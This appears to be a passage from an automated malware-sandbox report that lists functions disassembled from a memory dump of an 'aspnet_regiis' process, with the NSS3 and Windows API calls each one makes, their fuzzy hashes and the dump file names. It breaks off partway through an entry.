API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 136e8c6bb0917c66ef304facc10e7000fe7f28940341f8d4b419fd42b04264bc
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 5C31E6729011018AE710C665DD48FAE726DEF80318F560E79D419979D0EB33BC46CE63

Function 6C3C0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C3C0A2C), ref: 6C3C0E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C3C0A2C), ref: 6C3C0E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C3C0A2C), ref: 6C3C0E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C3C0A2C), ref: 6C3C0E90
free.MOZGLUE(00000000), ref: 6C3C0EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C3C0A2C), ref: 6C3C0ED9

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 82bce81efbc35ee5268881c5a56bd3e3998f4d44d562197a97f5961bc125adc1
Instruction ID: f29ec3723ff8cae2c15b0a6fcc07c7d74350acba8c72bc74e52d95ff1219d982
Opcode Fuzzy Hash: 82bce81efbc35ee5268881c5a56bd3e3998f4d44d562197a97f5961bc125adc1
Instruction Fuzzy Hash: 3C212CF2F81AC457EB0095B59C85F6F72AEDBC164CF190035D81867A02EB61DC148AA3

Function 6C3AA9B0 Relevance: 9.1, APIs: 6, Instructions: 101synchronizationCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,?,6C489270), ref: 6C3AA9BF
PR_IntervalToMilliseconds.NSS3(?,?,6C489270), ref: 6C3AA9DE

Part of subcall function 6C3AAB40: __aulldiv.LIBCMT ref: 6C3AAB66

Part of subcall function 6C48CA40: LeaveCriticalSection.KERNEL32(?), ref: 6C48CAAB

LeaveCriticalSection.KERNEL32(?), ref: 6C3AAA2C
WaitForSingleObject.KERNEL32(?,-00000001), ref: 6C3AAA39
EnterCriticalSection.KERNEL32(?), ref: 6C3AAA42
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C3AAAEB

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalSection$LeaveObjectSingleWait$EnterIntervalMillisecondsValue__aulldiv
String ID:
API String ID: 4008047719-0
Opcode ID: 759661d3c7b545c1b15e3a9e4bfec0e59f0d98335cf5accc7cd6e8410b55936d
Instruction ID: e3df0ad031f07d3b3362dce8f3c360ed1d5f253fbec0438bd23bf5233544d1ca
Opcode Fuzzy Hash: 759661d3c7b545c1b15e3a9e4bfec0e59f0d98335cf5accc7cd6e8410b55936d
Instruction Fuzzy Hash: 3D41A071604701CFD7109F68C984796BBF5FB06318F29862DE46E8BA41DB72E892CF90

Function 6C3D88D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C3E0725,00000000,00000058), ref: 6C3D8906
EnterCriticalSection.KERNEL32(?), ref: 6C3D891A
PL_ArenaAllocate.NSS3(?,?), ref: 6C3D894A
calloc.MOZGLUE(00000001,6C3E072D,00000000,00000000,00000000,?,6C3E0725,00000000,00000058), ref: 6C3D8959
memset.VCRUNTIME140(?,00000000,?), ref: 6C3D8993
PR_Unlock.NSS3(?), ref: 6C3D89AF

Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07AD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07CD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07D6
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C34204A), ref: 6C3B07E4
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,6C34204A), ref: 6C3B0864
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C3B0880
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,6C34204A), ref: 6C3B08CB
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08D7
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08FB

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
String ID:
API String ID: 1716546843-0
Opcode ID: 6cea06993f6ef6392305208dd01b8111fb5b6bf9ece60902ce49d002098db94b
Instruction ID: 4b08bbd54d7e3172950f189694e96a526323a3ca6d5962ab112c8b6b40b79db4
Opcode Fuzzy Hash: 6cea06993f6ef6392305208dd01b8111fb5b6bf9ece60902ce49d002098db94b
Instruction Fuzzy Hash: 0131D5B3A002159BD7009F28CC45A5AB7A8AF0535CF169526EC9C9BB41E732F845CFE3

Function 6C3CAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C3CAEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C3CAECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C3CAEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C3CAF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C4E9500), ref: 6C3CAF23

Part of subcall function 6C41F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C41F0C8
Part of subcall function 6C41F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C41F122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C3CAF37

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: e2bd909ac83c3c1e042483844581073a726da426c1ca4e2f7f2a4c61c7b0dcef
Instruction ID: d0f5288e73f6668a44fd47356234a536fd0cffbc71ac2adc74446df49f0f488e
Opcode Fuzzy Hash: e2bd909ac83c3c1e042483844581073a726da426c1ca4e2f7f2a4c61c7b0dcef
Instruction Fuzzy Hash: 3621FB71A092005BEB108E189C41F9E7BE4AF8572CF144319FD549B7D1E732D9058BE7

Function 6C44EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C44EE85
realloc.MOZGLUE(3B4C37C4,?), ref: 6C44EEAE
PORT_Alloc_Util.NSS3(?), ref: 6C44EEC5

Part of subcall function 6C420BE0: malloc.MOZGLUE(6C418D2D,?,00000000,?), ref: 6C420BF8
Part of subcall function 6C420BE0: TlsGetValue.KERNEL32(6C418D2D,?,00000000,?), ref: 6C420C15

htonl.WSOCK32(?), ref: 6C44EEE3
htonl.WSOCK32(00000000,?), ref: 6C44EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C44EF01

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: f1c58accd4cc5fda7c62d64331b4b48c7e082752315a7494349247ce2b89bd0a
Instruction ID: c1d379ba5c0d3a107df6fe009b4f82a6d127fc0868ce298cc575d6efb8405d87
Opcode Fuzzy Hash: f1c58accd4cc5fda7c62d64331b4b48c7e082752315a7494349247ce2b89bd0a
Instruction Fuzzy Hash: 1C21A031A00215AFDB10EF28DCC4E9AB7A4EF45359F258169EC099B741E331E814CBE6

Function 6C3FEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C3FEE49

Part of subcall function 6C41FAB0: free.MOZGLUE(?,-00000001,?,?,6C3BF673,00000000,00000000), ref: 6C41FAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C3FEE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C3FEE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C3FEE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C3FEEB3

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: a34cf5e415ee6745f3d6754f12b9975d597441d815adcb3bd09d837b041a620a
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: D821C0B6A003206BEB118A28EC81EAB77A8AB59708F050565FD189B751E672DC15CBF1

Function 6C414820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C414EB8,?), ref: 6C414884

Part of subcall function 6C418800: TlsGetValue.KERNEL32(?,6C42085A,00000000,?,6C3C8369,?), ref: 6C418821
Part of subcall function 6C418800: TlsGetValue.KERNEL32(?,?,6C42085A,00000000,?,6C3C8369,?), ref: 6C41883D
Part of subcall function 6C418800: EnterCriticalSection.KERNEL32(?,?,?,6C42085A,00000000,?,6C3C8369,?), ref: 6C418856
Part of subcall function 6C418800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C418887
Part of subcall function 6C418800: PR_Unlock.NSS3(?,?,?,?,6C42085A,00000000,?,6C3C8369,?), ref: 6C418899

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C414EB8,?,?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C41484C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C414EB8,?,?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C41486D
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C3D78F8), ref: 6C414899
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4148A9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4148B8

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
String ID:
API String ID: 2226052791-0
Opcode ID: 2bbbf11c9b2b6f5f142f4ad3e34d954f0d719cb1b8ec5ba60382b8e81c1ab1fc
Instruction ID: 092530735ea3844a4969f93c0421292fdf76fcd9612ddb82a5eae11240c5c9a2
Opcode Fuzzy Hash: 2bbbf11c9b2b6f5f142f4ad3e34d954f0d719cb1b8ec5ba60382b8e81c1ab1fc
Instruction Fuzzy Hash: C921C5BAF0424097EF00EFA5DC85E6677B8AF0629D7151528DE894BF02E722F81587E1

Function 6C4D8910 Relevance: 9.1, APIs: 6, Instructions: 55threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C4D892E

Part of subcall function 6C3B0F00: PR_GetPageSize.NSS3(6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000,?,6C34204A), ref: 6C3B0F1B
Part of subcall function 6C3B0F00: PR_NewLogModule.NSS3(clock,6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000,?,6C34204A), ref: 6C3B0F25

PR_Lock.NSS3 ref: 6C4D8950

Part of subcall function 6C489BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C3B1A48), ref: 6C489BB3
Part of subcall function 6C489BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C3B1A48), ref: 6C489BC8

getprotobynumber.WSOCK32(?), ref: 6C4D8959
GetLastError.KERNEL32(?), ref: 6C4D8967
PR_GetCurrentThread.NSS3(?,?), ref: 6C4D896F
PR_Unlock.NSS3(?,?), ref: 6C4D898A

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
String ID:
API String ID: 4143355744-0
Opcode ID: 6f17e36f6c66f47eebcdcda861ab03fb891056883fe67824cbbdc3e89ef2294f
Instruction ID: 58a1cbf2e5d46ab14290a899555e9f74034e6909e12ae03e942c247328d3db9b
Opcode Fuzzy Hash: 6f17e36f6c66f47eebcdcda861ab03fb891056883fe67824cbbdc3e89ef2294f
Instruction Fuzzy Hash: 5E110672A100209BC700EF799C10D5A7AA4AF46738F0713AAEC0557B61D731EC04CBCA

Function 6C456840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,6C45AA9B,?,?,?,?,?,?,?,00000000,?,6C4580C1), ref: 6C456846

Part of subcall function 6C3B1770: calloc.MOZGLUE(00000001,0000019C,?,6C3B15C2,?,?,?,?,?,00000001,00000040), ref: 6C3B178D

PR_NewMonitor.NSS3(00000000,?,6C45AA9B,?,?,?,?,?,?,?,00000000,?,6C4580C1), ref: 6C456855

Part of subcall function 6C418680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C3C55D0,00000000,00000000), ref: 6C41868B
Part of subcall function 6C418680: PR_NewLock.NSS3(00000000,00000000), ref: 6C4186A0
Part of subcall function 6C418680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C4186B2
Part of subcall function 6C418680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C4186C8
Part of subcall function 6C418680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C4186E2
Part of subcall function 6C418680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C4186EC
Part of subcall function 6C418680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C418700

PR_NewMonitor.NSS3(?,6C45AA9B,?,?,?,?,?,?,?,00000000,?,6C4580C1), ref: 6C45687D

Part of subcall function 6C3B1770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C3B18DE
Part of subcall function 6C3B1770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C3B18F1

PR_NewMonitor.NSS3(?,6C45AA9B,?,?,?,?,?,?,?,00000000,?,6C4580C1), ref: 6C45688C

Part of subcall function 6C3B1770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C3B18FC
Part of subcall function 6C3B1770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C3B198A

PR_NewLock.NSS3 ref: 6C4568A5

Part of subcall function 6C4898D0: calloc.MOZGLUE(00000001,00000084,6C3B0936,00000001,?,6C3B102C), ref: 6C4898E5

PR_NewLock.NSS3 ref: 6C4568B4

Part of subcall function 6C4898D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C489946
Part of subcall function 6C4898D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3416B7,00000000), ref: 6C48994E
Part of subcall function 6C4898D0: free.MOZGLUE(00000000), ref: 6C48995E

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: 62efecebd891e40abc4351f6362e0c71a36839577088eb0f90fa01f0149774fc
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction Fuzzy Hash: 4E0128B1A02F0786F751AB754811FE776E45F11289F90043E84A9CAB40EF31E418CBA2

Function 6C3AAE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3AAFDA

Strings

misuse, xrefs: 6C3AAFCE
unable to delete/modify collation sequence due to active statements, xrefs: 6C3AAF5C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3AAFC4
%s at line %d of [%.10s], xrefs: 6C3AAFD3

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 2af4bcc0030b9d4bb74894f5094147b412283fc26a8a50e14abfb2e6e50f44c7
Instruction ID: 29537387773b866c0bd49a3da43febb56e2079904f3ccb3c4ecd3d17241664c6
Opcode Fuzzy Hash: 2af4bcc0030b9d4bb74894f5094147b412283fc26a8a50e14abfb2e6e50f44c7
Instruction Fuzzy Hash: 9F91E372A012158FDB08CF99C850EEAB7F1FF49318F1981A8E865AB751D335AC12CF60

Function 6C436DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C436E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C436E57

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C436E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C436EAA

Strings

nMl, xrefs: 6C436DF9

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: nMl
API String ID: 3163584228-2700914739
Opcode ID: 6f44bdef28831f2cc49e255f158bd62d35ea0993c96499deea2a9591ba4ccde1
Instruction ID: b5bea800fe1d60c6a533308c59aad533d30b0908a107d9e6dec6e5d1ae762215
Opcode Fuzzy Hash: 6f44bdef28831f2cc49e255f158bd62d35ea0993c96499deea2a9591ba4ccde1
Instruction Fuzzy Hash: F2319C32611523AADB149E35CD06FD6B7A5BB8931BF10163CD89ED6BC0EB31A458CF81

Function 6C46A8F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C452AE9,00000000,0000065C), ref: 6C46A91D

Part of subcall function 6C40ADC0: TlsGetValue.KERNEL32(?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE10
Part of subcall function 6C40ADC0: EnterCriticalSection.KERNEL32(?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE24
Part of subcall function 6C40ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C3ED079,00000000,00000001), ref: 6C40AE5A
Part of subcall function 6C40ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE6F
Part of subcall function 6C40ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE7F
Part of subcall function 6C40ADC0: TlsGetValue.KERNEL32(?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AEB1
Part of subcall function 6C40ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AEC9

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C452AE9,00000000,0000065C), ref: 6C46A934
SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6C452AE9,00000000,0000065C), ref: 6C46A949
free.MOZGLUE(?,00000000,0000065C), ref: 6C46A952

Strings

*El, xrefs: 6C46A8F6

Memory Dump Source

